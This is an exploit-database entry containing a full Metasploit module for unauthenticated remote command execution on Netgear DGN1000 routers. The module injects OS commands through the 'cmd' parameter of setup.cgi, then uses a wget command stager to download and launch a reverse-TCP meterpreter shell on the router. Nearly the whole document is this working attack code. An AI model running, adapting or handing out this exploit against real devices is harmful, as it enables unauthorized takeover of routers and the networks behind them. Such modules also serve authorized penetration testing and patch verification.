Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)

Properties

Published:
26.10.2017
Target:
Netgear DGN1000 1.1.00.48

Code

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
      'Description' => %q{
        This module exploits an unauthenticated OS command execution vulneralbility
        in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
        DGN2000v1 models.
        },
      'Author' => [
        'Mumbai ', # module
        'Robort Palerie ' # vuln discovery
      ],
      'References' => [
          ['EDB', '25978'],
      ],
      'DisclosureDate' => 'Jun 5 2013',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
      },
      'Privileged' => true,
      'Payload' => {
        'DisableNops' => true,
      },
      'Targets' => [[ 'Automatic', {} ]],
    ))
  end
 
  def check
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET'
        })
      if res && res.headers['WWW-Authenticate']
        auth = res.headers['WWW-Authenticate']
        if auth =~ /DGN1000/
          return Exploit::CheckCode::Detected
        end
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end
 
  def exploit
    print_status("#{peer} - Connecting to target...")
 
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
    end
 
    print_status("#{peer} - Exploiting target ....")
    execute_cmdstager(
      :flavor => :wget,
      :linemax => 200,
      :concat_operator => " && "
    )
  end
 
  def execute_command(cmd, opts)
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET',
        'vars_get' => {
          'next_file' => 'netgear.cfg',
          'todo' => 'syscmd',
          'cmd' => cmd.to_s,
          'curpath' => '/',
          'currentsetting.htm' => '1'
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end